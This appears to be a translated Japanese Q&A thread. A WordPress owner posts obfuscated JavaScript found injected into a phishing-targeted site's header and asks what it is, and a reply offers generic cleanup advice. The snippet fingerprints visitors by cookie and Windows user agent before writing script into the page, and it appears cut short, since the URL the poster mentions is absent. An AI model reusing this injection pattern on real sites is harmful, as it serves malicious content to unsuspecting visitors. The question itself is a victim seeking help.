1

フィッシング操作の標的にされたWordPressのインストールがあります。ヘッダーでこれを見つけた以外は、セキュリティはほとんどカバーされていると思いました。

var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('</script>')};

最後のそのURLは非常に疑わしいです。私はグーグルで検索しましたが、リードが見つかりませんでした:-(

WPインストールでコードのソースをまだ見つけていません。テンプレートファイルやデータベースには書き込まれません。WPインストールを今すぐ更新中です。

誰かがこれについて何か知っていますか?

4

1 に答える 1

0

それは私には奇妙に見えます。たぶん、wordpressを再インストールして、非常に複雑なパスワードを選択して、許可されていない人がサイトにアクセスできないようにしてください。ページからグーグルアナリティクスコードを削除して、それが違いを生むかどうかを確認することをお勧めします。複雑なパスワードには、数字、大文字と小文字、スラッシュなど、考えられるあらゆるものが含まれます。8文字より長いことを確認してください。サイトが感染している場合は、感染していないことが確実になるまで、今すぐWebから削除してください。

于 2010-08-27T22:33:13.643 に答える